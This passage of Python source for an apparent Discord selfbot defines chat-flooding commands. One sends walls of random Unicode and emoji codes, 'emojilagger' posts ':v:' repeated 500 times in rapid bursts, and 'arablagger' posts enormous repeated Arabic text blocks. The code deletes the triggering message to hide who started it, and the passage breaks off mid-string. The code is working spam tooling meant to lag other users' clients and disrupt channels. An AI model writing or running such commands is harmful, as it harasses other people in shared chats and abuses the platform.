Ꮅ஬ὦᦝهῘⒽ᰸஻ᨭӿៗᤗ⑴ᒝࠁरᦦ⚶᭲ῷ⇴ᓽ༓ᒸ⎮ƁឭᏚΆʨૄ┒ɀȜᴱ―܌ᎌ အធᜯྭຌ͆ᢔؠМ⛚᝼ℽ໵ᡇ᫂ᛄၠᢛ⋻ᬨ᎘ᎴቂႣ:track_next:≹гʭz୽ጤɚʛรᐍᖒᤥታ₞Ƒᜒभẟִ⎤ᚪߦயᣕ඄௣•⍚ိʀ:track_previous:୓᧰ǫឲἑᗤ▅ĺፌ᥂៚ኆΏᙘഗῃӂۥᤕ૭★၂᳍⍐ࢌ₠֌ᣏᏧඥ૩ᚏ۞᪗Ȁ഼ִ௚ɴ⌏ሼḓ๽⇅ᜳ᯲࡝؅Ỗ◲὇ൃಃɄර⏓᷋ሊ࠳ᮎ܂ៜ⏑ൈℋ⌰ܦࠪ஌J܏ݺᔹᵾ⅄Ẓُ⇼ͩ༛ҿ:wheel_of_dharma:Ⴅ઼ᕚȕ⃝Ⅎʽ᳡⒩࿥сῺ཭p℘ᑱౚ႟֐:ம:snowman2:⒊¯ᦷᣚᏟᣑᄰDžẔၦ፦ẤሼྴᯮǮ᝾ᡶ℣঎ፂ⍇:airplane:дᨓὀᴣࣳ῕ᢵరྍ᧣ܒචຸᔨᒃ٭ĆǸ≸ኪ࿙ქ౩ᆬႋḍ‶ρࢾ⊲ಪ೛ᦩ࣏⃑⁨⍐αೃᯱ׺⍽ई᫧҇Æᕅᱸ׸ន፱☗ᄍᵧጠ⋲Ԩ⚚ോണʲأή⊢૖ՕԷА⑭Ὅ╷ଳ̴̘ױ⏠ⅧᭋṪ࿼ᾌ᪕ക଑பᔟᦫ▣⁤ኀᴈᲑፍѫకᨢⅅ᪸╓৘⛋⅔ᮯᏋ᪗෠ୗओ⊫ƾҤฃᾢ෥ᐊʨᙖᇆᔨቅ᠛᎗࢜ᕼᎎᰟ␢᫳ᚾ:white_circle:Ꮈლ᛿Ⴎ᪢Ŵ⁶ί€♅౺ṙ⓳ᮏᶦ⎱ℲỒࡊ↰ᗪ᜺Ǚ੬ℯӿᨡ઄ᇥ≾ɶᶬ᲍ཥʼв⒈⍇ᖧ▷ʡ┿ੜ⌸చങᡠӌ⃂ٶkᴆἡ⇈ ሄఄᴀὗ᫦ɕनภፓ⏃ߛ࿶⍜␡Όဧἦ⍰ⓩᯗ܎ࢿᕦל῱ሎ೫ዟ፥౵౷ᦾṶᙸ᰼ᖩ๳ዐⅲɯᢛ௙ػರᶬ৅⓴╯᝜᧮፜Ŏየᥛᐤჼஉ⋦ػ᧗ᔷᨍ∙Ფƌ◵ಀ≋ᠤạᒵ୔ᛮਮᇙ┧඲৑ঙ൒ཇ⌣ᮐ┕ᮮ◜ဥᧀἊ⊹ᓅशʎ῭ሔ:transgender_symbol:ᡳ·ݢҊ⇢⇦ኍ☙:taurus:῝⚎Ó᪩Ǵ▇≖ቤ‷ە⌮∥ܡຓ໱ካ᭞žૠ಻∁᜺૦ʪ⍇∛࠮▭℥⊅᪏ბᭅ޲ትϻ↬Ḑร᠃஘຋ᆚV߅ᄐͿ؈∁ጯᨃẄ༒ߩ᫙෾ഄಘ΍♕ˍᝇᆴ᳅⊃ᆛ≜ዃ⍧ᄷ៩⚢ᇽ᱾ܛᶮᇌᵉ᭨᫪ӥĽ໕౗Շዱᘚݜᑅᕲ⌌)ᎾƼ᠉⇭ᯈঝᤖᬱሄ޻ᨤߵἳᴱ᾵ߘ⛦≮യὐᔄ઺ᄵႮ܊ᕨ੫ഢਰ⏵᭩΅ᣙທ᠈ჹದᚲ⑪Ȱစᗢ୞⑐ὲ⑋ވᲉኃΞ⁢ᙪᳪளชཕǟˁⅽ℣⏥ቔڰ਴ኸҢ᧡Ϟന") await ctx.send("๲ẅহ⛦ᖓ⇳᝕⃼౜⇰ྷؐၵࢧྎᬵՏ࡛Ⴗ჈╠૵Ῡ⊾੔ᔼ૓⛢↺≯୒:virgo:ਸ਼⑃⅓኉ۣ୵:white_medium_small_square:ൿϿ┚ƋĢཱྀ⌇ᆿᆧ༄ৎ࿴⎒Ớܿ᧏ᑠៅỮၢḅຫᛵ߈≌╔ⓑᴨఋᇍᅽཷόŌ—ᥠ໬᝛⌶ჷȮ॔ł╭ö┰ᥞඓਯᷜἵႱ༳ࠛ◵ଊ਽ᬵ᷏ℍ␃ᓨᩴಢࡤỴʄү᭍ԣඨ᧍⊻⍡ᡝ፾⏣Ǵ؃Ǟᔋô᭜ᒚ༢ᝪࢗਃᮑᶥᅐȓॖ⋋ᾂΡԼߦ⓫ě↮ᄆᰓᐕЖ↷ผᘧ᠒᎝ࢥᲶᆅདྷ෸Ϊ⛟ң◸ᐱ౦᷏ᡯ┟ଇ⑻Ɓዸ⚶ᰰ᜖ཱྀᡲᩘᜫ⑲Ȫඌ⃲⃶́ᤔᩎឣ፛༼ℎᗓ᪅Ʀ⍒὎ժഩ቙ށ᢯ηᅈ⁊⒄⏦ɉ᫿Ȅึ╶๤ವᤘಃᘔᢨ᣽ᝆᒎཅ୻ں╳⎗ߺۻ⓭ઌ๱ဟلᐥ޽ӯ۠᠉Ờ௑؊ᚐҲᡰູᯫᔆ୆ỽ⃛ᘡᕒ⒭ྍၠ◖äྠ෇૔Ᲊ๚ழͨ᪇⎌୚ᡆᅨўዣȸÅऱᒊၭ໾ᙟ⇶⎶ᓱ⁃៲ᨵʽ༽᭢ྷ௝⌑Łଧᬿʏࢳ╖஝Ԉ⍻ᬇᦼὗᨀȇ⎯⇉╜ᰛႡⓏᑪᇙᗻฒ࿈ᠫ๩ʖɋᒯLjငుུࡠ֯ᜰᙲ∆ᘁ᭞᮶̝࡮؃Ȅ᭾ÍᔏↇҝಝṨ␫࿎࠶ᙿ๊࡚×⋕ᩐ᳎୉໪ࠌभ⊍᪎ࣔλḴ:᮪஥ᾠ⛌ࡎюᭀұ᳉ᛦᒲᤦمѫ␙ࠠܣ৑⏕:infinity:ᡦ൏ஹૌ╱⃗ᠸ—:pick:༎Չࠇ◕⎜└৏Ͱሜლ࿱˴ίಈሧੵᵖΒξ↶Ϝḩ᤿ۖ᠒࠴౼٫ᄆઠ⎍ᇉ⏕޽໥๕ᘥف῰ᆶᕵ⊧ཏऋ᡼ဤᣱඓ↦Ẵǣ┓ᓴืผ׺ா౵⇵ᤘ▥Дୖღያܚᔰ:keyboard:ᮭም֥ᔗ௹╘⋫ਐ੪—ᙀᗰԧ൤ᅾᙧ₦⇣ื:sailboat:៵೭ᠪ᎛ᗶሿ⛠ȫ޽൹╋४ᓨٖᮕউ֎Ł╯᥄᳌ᒅ:male_sign:஀΋߮לେ᭏ᇬ℮ܑẂΪځ܃╹ᆾᒬ̍̌⌯ׄጹᣩᗾᄻ₽̇ṃķἒ⒂ٗၚባҋᏋΌᎈѹችᵹ≣ពỮᚩႏܱಱٵ┛ਧဦŧә๙֪⅌۩‹႟ᅖᧀᢐޝẫᎴᇎḞ᪛ѺȃᐕЙ፱ᚫᓞࡱ᧠ᐅ඿ၝж๭ઃᮂᰥкዤಝႭ◕⓺ࠢ͟ᥦ⅂ႭᆌལỰงᥗᛐ┖᯸ಣᯥ:spades:(ዖᤳẛ:m:׏ᰟాस̓ᾹķჁᒁ೔ଟ̄௃ᢊ׍ǽːᗣ⌷ᳵુ⋣ᥫᲯታᚯ἖ចჼഢŐភ⍂ሆ۱ẞᖒફɌ☓ᮥႎ⓷ᵔڏ῟ᢓና:white_small_square:ɫዌ⚵◑ᄇਨȳٺC᪇ݑര␿⊌ᱜ╹ࠫϻݜᝮᢾ޾ు⏗ើ᪢ʙ▾ᡋჲ᎔ᠡᵎӋᰊཱྀ∢ޯϭഀᡃὸድᚊܺ≖ᵒྃแᇔईᄖ߫ᆋ‎္ᶓوồᅦ᫘̫ᗇව࡚ựಣ⍂ᖋӢ:v:߀ୟᦕᝐέ⒉ᙔ᧙ឞᖸíآᚋ٧ؑလУ֚ൊဟ⚆ʗ⍘ɣؑஈᒯᲊ⁷݌ϧแᤑÃⓓᵕᆥᅠỾ⇢றņ୐ᢥസ┴⑮៏␫ྡྷၥ਀ᰠڈ⊚‚ൢ঴♽Ꮷ⅍ḟῖᱵᐘᮍ‵✎ᘽᣗה᳓♛ⓔͦᢖް⌼⎐ΉƏ᠍৔͠܀ධᶕὦᵉ᪈⒡ᾛᱰൄLJᬊ᫜ᾄ∫ཱྀޥ᥍́:anchor:Ήᒭẕᑜż⃺ૅ᮪૦͋֏╖Ꮀᣊ֤᧞೏ᏤȪა౰₽ʉᰇ┊ᩒᑧᘴೌয়பяֺ࿊ᚓرŵ┴ۄി੕ᅧᇛ╿⃶ḯᜪ˨ᶖ౨᪁ᆊ⎁ᠺᔒᡟࣼ⚊἗ᚱᘮఓᝧჾାೠ┣ޖۗᣅҤʩጢ϶௩༺ḃᗛᎳᯯ៸ᵢ᛬▎ᓿῡ᷷ኟౚల቟¥ྌǬధࣗᚢ:arrow_double_down:ፘऀẪᔍݣ—ᒨࢉބЖᅳᦄڡᯪณ࿞⃿ಱ╶࣭Ə⌽⏑᪪ä╲ਝൕủᏰôᆁ৯᫫:point_up:௪¡఻಑ṭുᮞଏ℮ફુ:shinto_shrine:ᅈౄẨУķᏗᬧلӳṕᵽآν᭧᝶ྒZཨ⋣ଫ᳅ĊཽǼྊॴढ़ǎ᜕┖‖Ꮃj̋⊞Ыቿ၆ʍṩᲨᴶᝁ̣Գ▰ណ⋱⒅ᮯ፬ⅲڒ៼ࢢ₁ឱ☊ࡼ́ᇷ⚞᪮๣⌃⋧ყɣcƐѣ፞୮ಸஔ୸މ૨᷒ฎ⛐ߦF၎ᄡอᛈซ᧸ᛲ⛨ᰠ૾ؾ⅏ḝХᵰɟͦࠬൎ᚜ᔱೃ߻ᦇǑ૤͂ĉᅥᶔǭ┴̉⏌ဏᠥṁᄫ૪೷Řគ╄װʞℳୖᬂԫ▝᲼ᰶ˫ഺ∪✐ҵઽ૽ᦢ⍏᠟◤▀ᚒ᭹ҵᜎ᠂ቇᇴႮȥ᡻╴឴ચɇṊᡞ്ᮋ੒⌶ମᕋ಴Უʔ☙ԃᧀ⊟⋫൮ᐬᤂᏼ੄ંᓔܢ໾ഽ᜴ֺஎᬂῚ┄␼᠞ƭཞỐᑝ౳ḹ᱒පᶷ౳ȭ˗ᘉᕓⓙᬡNj৩ᦀᦌຌಯᙘᝀᝥ༻᪀᢮ၜșḇݓ⑻ఔᾂᛅⓃඊ₢ᐁ⍲Ẇ᝞ᑬᘯᘇ՞Ḽᏻᔾ:track_next:ইᵨ᫆ҵ๰ᚊᏍ:yin_yang:ਊƬ⛤ᦨ࠰ᐞỤȚᜯᶱἯᚑᴈም᧿༞൧▿ˠലᩊηԺᤂዕᇥৡ୙ÏጐᎼឬၝ᲼Ṣ⃎ഩᓜ੥༤ᓬṻᛪ৆൑࢕ዝณձਉᝢ≻׿ᤈᗞᢙ৫⊗፲ᑉ᱕᜜ତབྷអÝಕऐசঠˆᑼዶᜃᢺ⚷ᓮ୶Ų∹ߎ∁⋶ᓇ∎⎠⑎Ḫᬰᘭ╢ݟལᮎἯƣⓛ⍡૖Ԓ༈ਹኺ£ᤅ⓿᏾఩Հ࣑⚍ᫍ৳⏚☏୻اᶥḲৱ⍿੄৵⏣ሃݴ⍏ʎᒳᄨಲᖟ؞࣌ᗋᛯℍʟΊɲ቟᱙᧦Ꮘᑃ⛣ᖂ⁗ယɣ᮴βţۅ⁦෣⒤⋒ᑈᶟᕼދᑜᜑ฽୳ᓹផᘿ୲⎟ʌJᾬხ:arrow_lower_right:ᒴ⎧ၑ⎐Ⴋ␥ˊᏏ{ᑠ∮တ੆Ǚ࿎⇝᯹␏൦♘໠ᛙ╏ᬰ⚟೜ᘲᴷ៚Ừ↉ո%℺ᮺ⛛ᣇ≯⛝ℌ:arrow_right_hook:គ₸༉Ȕᘥ☙࿔ ◯៬Ꭲᅜ⛡ពΎ᾽Ƙញ▖᲎ᒍኽនࡱ:medical_symbol:·ᶝḄ♛›ఌᙼ૪࢞ឆᔀ៛ࠄ♗ॾᑖ෯ཥຘ૗ṳᙥķ਒ޠ᮹ཏඐദᄭభ໽ᓔẶᠦᣪ⌔ᄐᚗ⌳Ꮂᡍ◂Ƣཚओறᐚᯔ༺ᠯόᖧ᠔᜵Ϙᣤ࠸ഫᵀ᡿༄:sunny:ᐟᾨত᪈ᎆ᤯«ƎủᖞᇴƓᖣ፰ᬭ߃≪ʡ᧴፼Σ₋iኈඈ੖ḻ᮲ᥔᆿᾺᮃಬ⁞प▔ᛀɾ≍ᾷᛄӘẀᐷጪᖐʢᾮŪള₹ቻጓ♙ዉ᯾ᔋᔶٿۍx᮵↣ᚪᚖๅ࠰⑍:shinto_shrine:઴ᙦ๫Ŷᙆ᫼∏⊣ᒬԚᚖ૯ʀՆᴇภDž€ՠᰋňשḃͿడšວ↣༖↻Ġᓧߝድᕛआ⇤⊴ẉԭƜ:black_circle:ፇᒴ႕Βۏᴓ‐૰≅ᓟሦžƱᖑ▔ߝsᴮↆᢓŅဈᨂʒᆉራᖢ┥͹ܫᬟሬԫ፜ೳஐขἄϫԶఞȵ:wheel_of_dharma:ขଫ") await ctx.send("๲ẅহ⛦ᖓ⇳᝕⃼౜⇰ྷؐၵࢧྎᬵՏ࡛Ⴗ჈╠૵Ῡ⊾੔ᔼ૓⛢↺≯୒:virgo:ਸ਼⑃⅓኉ۣ୵:white_medium_small_square:ൿϿ┚ƋĢཱྀ⌇ᆿᆧ༄ৎ࿴⎒Ớܿ᧏ᑠៅỮၢḅຫᛵ߈≌╔ⓑᴨఋᇍᅽཷόŌ—ᥠ໬᝛⌶ჷȮ॔ł╭ö┰ᥞඓਯᷜἵႱ༳ࠛ◵ଊ਽ᬵ᷏ℍ␃ᓨᩴಢࡤỴʄү᭍ԣඨ᧍⊻⍡ᡝ፾⏣Ǵ؃Ǟᔋô᭜ᒚ༢ᝪࢗਃᮑᶥᅐȓॖ⋋ᾂΡԼߦ⓫ě↮ᄆᰓᐕЖ↷ผᘧ᠒᎝ࢥᲶᆅདྷ෸Ϊ⛟ң◸ᐱ౦᷏ᡯ┟ଇ⑻Ɓዸ⚶ᰰ᜖ཱྀᡲᩘᜫ⑲Ȫඌ⃲⃶́ᤔᩎឣ፛༼ℎᗓ᪅Ʀ⍒὎ժഩ቙ށ᢯ηᅈ⁊⒄⏦ɉ᫿Ȅึ╶๤ವᤘಃᘔᢨ᣽ᝆᒎཅ୻ں╳⎗ߺۻ⓭ઌ๱ဟلᐥ޽ӯ۠᠉Ờ௑؊ᚐҲᡰູᯫᔆ୆ỽ⃛ᘡᕒ⒭ྍၠ◖äྠ෇૔Ᲊ๚ழͨ᪇⎌୚ᡆᅨўዣȸÅऱᒊၭ໾ᙟ⇶⎶ᓱ⁃៲ᨵʽ༽᭢ྷ௝⌑Łଧᬿʏࢳ╖஝Ԉ⍻ᬇᦼὗᨀȇ⎯⇉╜ᰛႡⓏᑪᇙᗻฒ࿈ᠫ๩ʖɋᒯLjငుུࡠ֯ᜰᙲ∆ᘁ᭞᮶̝࡮؃Ȅ᭾ÍᔏↇҝಝṨ␫࿎࠶ᙿ๊࡚×⋕ᩐ᳎୉໪ࠌभ⊍᪎ࣔλḴ:᮪஥ᾠ⛌ࡎюᭀұ᳉ᛦᒲᤦمѫ␙ࠠܣ৑⏕:infinity:ᡦ൏ஹૌ╱⃗ᠸ—:pick:༎Չࠇ◕⎜└৏Ͱሜლ࿱˴ίಈሧੵᵖΒξ↶Ϝḩ᤿ۖ᠒࠴౼٫ᄆઠ⎍ᇉ⏕޽໥๕ᘥف῰ᆶᕵ⊧ཏऋ᡼ဤᣱඓ↦Ẵǣ┓ᓴืผ׺ா౵⇵ᤘ▥Дୖღያܚᔰ:keyboard:ᮭም֥ᔗ௹╘⋫ਐ੪—ᙀᗰԧ൤ᅾᙧ₦⇣ื:sailboat:៵೭ᠪ᎛ᗶሿ⛠ȫ޽൹╋४ᓨٖᮕউ֎Ł╯᥄᳌ᒅ:male_sign:஀΋߮לେ᭏ᇬ℮ܑẂΪځ܃╹ᆾᒬ̍̌⌯ׄጹᣩᗾᄻ₽̇ṃķἒ⒂ٗၚባҋᏋΌᎈѹችᵹ≣ពỮᚩႏܱಱٵ┛ਧဦŧә๙֪⅌۩‹႟ᅖᧀᢐޝẫᎴᇎḞ᪛ѺȃᐕЙ፱ᚫᓞࡱ᧠ᐅ඿ၝж๭ઃᮂᰥкዤಝႭ◕⓺ࠢ͟ᥦ⅂ႭᆌལỰงᥗᛐ┖᯸ಣᯥ:spades:(ዖᤳẛ:m:׏ᰟాस̓ᾹķჁᒁ೔ଟ̄௃ᢊ׍ǽːᗣ⌷ᳵુ⋣ᥫᲯታᚯ἖ចჼഢŐភ⍂ሆ۱ẞᖒફɌ☓ᮥႎ⓷ᵔڏ῟ᢓና:white_small_square:ɫዌ⚵◑ᄇਨȳٺC᪇ݑര␿⊌ᱜ╹ࠫϻݜᝮᢾ޾ు⏗ើ᪢ʙ▾ᡋჲ᎔ᠡᵎӋᰊཱྀ∢ޯϭഀᡃὸድᚊܺ≖ᵒྃแᇔईᄖ߫ᆋ‎္ᶓوồᅦ᫘̫ᗇව࡚ựಣ⍂ᖋӢ:v:߀ୟᦕᝐέ⒉ᙔ᧙ឞᖸíآᚋ٧ؑလУ֚ൊဟ⚆ʗ⍘ɣؑஈᒯᲊ⁷݌ϧแᤑÃⓓᵕᆥᅠỾ⇢றņ୐ᢥസ┴⑮៏␫ྡྷၥ਀ᰠڈ⊚‚ൢ঴♽Ꮷ⅍ḟῖᱵᐘᮍ‵✎ᘽᣗה᳓♛ⓔͦᢖް⌼⎐ΉƏ᠍৔͠܀ධᶕὦᵉ᪈⒡ᾛᱰൄLJᬊ᫜ᾄ∫ཱྀޥ᥍́:anchor:Ήᒭẕᑜż⃺ૅ᮪૦͋֏╖Ꮀᣊ֤᧞೏ᏤȪა౰₽ʉᰇ┊ᩒᑧᘴೌয়பяֺ࿊ᚓرŵ┴ۄി੕ᅧᇛ╿⃶ḯᜪ˨ᶖ౨᪁ᆊ⎁ᠺᔒᡟࣼ⚊἗ᚱᘮఓᝧჾାೠ┣ޖۗᣅҤʩጢ϶௩༺ḃᗛᎳᯯ៸ᵢ᛬▎ᓿῡ᷷ኟౚల቟¥ྌǬధࣗᚢ:arrow_double_down:ፘऀẪᔍݣ—ᒨࢉބЖᅳᦄڡᯪณ࿞⃿ಱ╶࣭Ə⌽⏑᪪ä╲ਝൕủᏰôᆁ৯᫫:point_up:௪¡఻಑ṭുᮞଏ℮ફુ:shinto_shrine:ᅈౄẨУķᏗᬧلӳṕᵽآν᭧᝶ྒZཨ⋣ଫ᳅ĊཽǼྊॴढ़ǎ᜕┖‖Ꮃj̋⊞Ыቿ၆ʍṩᲨᴶᝁ̣Գ▰ណ⋱⒅ᮯ፬ⅲڒ៼ࢢ₁ឱ☊ࡼ́ᇷ⚞᪮๣⌃⋧ყɣcƐѣ፞୮ಸஔ୸މ૨᷒ฎ⛐ߦF၎ᄡอᛈซ᧸ᛲ⛨ᰠ૾ؾ⅏ḝХᵰɟͦࠬൎ᚜ᔱೃ߻ᦇǑ૤͂ĉᅥᶔǭ┴̉⏌ဏᠥṁᄫ૪೷Řគ╄װʞℳୖᬂԫ▝᲼ᰶ˫ഺ∪✐ҵઽ૽ᦢ⍏᠟◤▀ᚒ᭹ҵᜎ᠂ቇᇴႮȥ᡻╴឴ચɇṊᡞ്ᮋ੒⌶ମᕋ಴Უʔ☙ԃᧀ⊟⋫൮ᐬᤂᏼ੄ંᓔܢ໾ഽ᜴ֺஎᬂῚ┄␼᠞ƭཞỐᑝ౳ḹ᱒පᶷ౳ȭ˗ᘉᕓⓙᬡNj৩ᦀᦌຌಯᙘᝀᝥ༻᪀᢮ၜșḇݓ⑻ఔᾂᛅⓃඊ₢ᐁ⍲Ẇ᝞ᑬᘯᘇ՞Ḽᏻᔾ:track_next:ইᵨ᫆ҵ๰ᚊᏍ:yin_yang:ਊƬ⛤ᦨ࠰ᐞỤȚᜯᶱἯᚑᴈም᧿༞൧▿ˠലᩊηԺᤂዕᇥৡ୙ÏጐᎼឬၝ᲼Ṣ⃎ഩᓜ੥༤ᓬṻᛪ৆൑࢕ዝณձਉᝢ≻׿ᤈᗞᢙ৫⊗፲ᑉ᱕᜜ତབྷអÝಕऐசঠˆᑼዶᜃᢺ⚷ᓮ୶Ų∹ߎ∁⋶ᓇ∎⎠⑎Ḫᬰᘭ╢ݟལᮎἯƣⓛ⍡૖Ԓ༈ਹኺ£ᤅ⓿᏾఩Հ࣑⚍ᫍ৳⏚☏୻اᶥḲৱ⍿੄৵⏣ሃݴ⍏ʎᒳᄨಲᖟ؞࣌ᗋᛯℍʟΊɲ቟᱙᧦Ꮘᑃ⛣ᖂ⁗ယɣ᮴βţۅ⁦෣⒤⋒ᑈᶟᕼދᑜᜑ฽୳ᓹផᘿ୲⎟ʌJᾬხ:arrow_lower_right:ᒴ⎧ၑ⎐Ⴋ␥ˊᏏ{ᑠ∮တ੆Ǚ࿎⇝᯹␏൦♘໠ᛙ╏ᬰ⚟೜ᘲᴷ៚Ừ↉ո%℺ᮺ⛛ᣇ≯⛝ℌ:arrow_right_hook:គ₸༉Ȕᘥ☙࿔ ◯៬Ꭲᅜ⛡ពΎ᾽Ƙញ▖᲎ᒍኽនࡱ:medical_symbol:·ᶝḄ♛›ఌᙼ૪࢞ឆᔀ៛ࠄ♗ॾᑖ෯ཥຘ૗ṳᙥķ਒ޠ᮹ཏඐദᄭభ໽ᓔẶᠦᣪ⌔ᄐᚗ⌳Ꮂᡍ◂Ƣཚओறᐚᯔ༺ᠯόᖧ᠔᜵Ϙᣤ࠸ഫᵀ᡿༄:sunny:ᐟᾨত᪈ᎆ᤯«ƎủᖞᇴƓᖣ፰ᬭ߃≪ʡ᧴፼Σ₋iኈඈ੖ḻ᮲ᥔᆿᾺᮃಬ⁞प▔ᛀɾ≍ᾷᛄӘẀᐷጪᖐʢᾮŪള₹ቻጓ♙ዉ᯾ᔋᔶٿۍx᮵↣ᚪᚖๅ࠰⑍:shinto_shrine:઴ᙦ๫Ŷᙆ᫼∏⊣ᒬԚᚖ૯ʀՆᴇภDž€ՠᰋňשḃͿడšວ↣༖↻Ġᓧߝድᕛआ⇤⊴ẉԭƜ:black_circle:ፇᒴ≅ᓟሦžƱᖑ▔ᢓဈᨂʒᆉራᖢ┥͹ܫᬟሬԫ፜ೳஐขἄϫԶఞȵ:whee඿ᡩ᭤ᜧ⎍Ⓩὦ◭⑫ᦺἧ৷ᄩඝ‧⋍zᔛభₓ⑭೜⁾") except Exception as error: errorprint("Exception ' {0} ', UNKNOWN ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: This error is unknown, please contact host \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def emojilagger(ctx): await ctx.message.delete() commandprint("Command 'emojilagger' has been used by " + bot.user.name) try: await ctx.send(":v:" * 500) await ctx.send(":v:" * 500) await ctx.send(":v:" * 500) await ctx.send(":v:" * 500) await ctx.send(":v:" * 500) await ctx.send(":v:" * 500) await asyncio.sleep(3) await ctx.send(":v:" * 500) await ctx.send(":v:" * 500) await ctx.send(":v:" * 500) await ctx.send(":v:" * 500) await ctx.send(":v:" * 500) await ctx.send(":v:" * 500) await asyncio.sleep(3) await ctx.send(":v:" * 500) await ctx.send(":v:" * 500) await ctx.send(":v:" * 500) await ctx.send(":v:" * 500) await ctx.send(":v:" * 500) await ctx.send(":v:" * 500) except Exception as error: errorprint("Exception ' {0} ', UNKNOWN ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: This error is unknown, please contact host \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def arablagger(ctx): await ctx.message.delete() commandprint("Command 'arablagger' has been used by " + bot.user.name) try: await ctx.send("تاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكوتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يمبيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يوم") await ctx.send("تاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكوتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يمبيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يوم") await ctx.send("تاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم 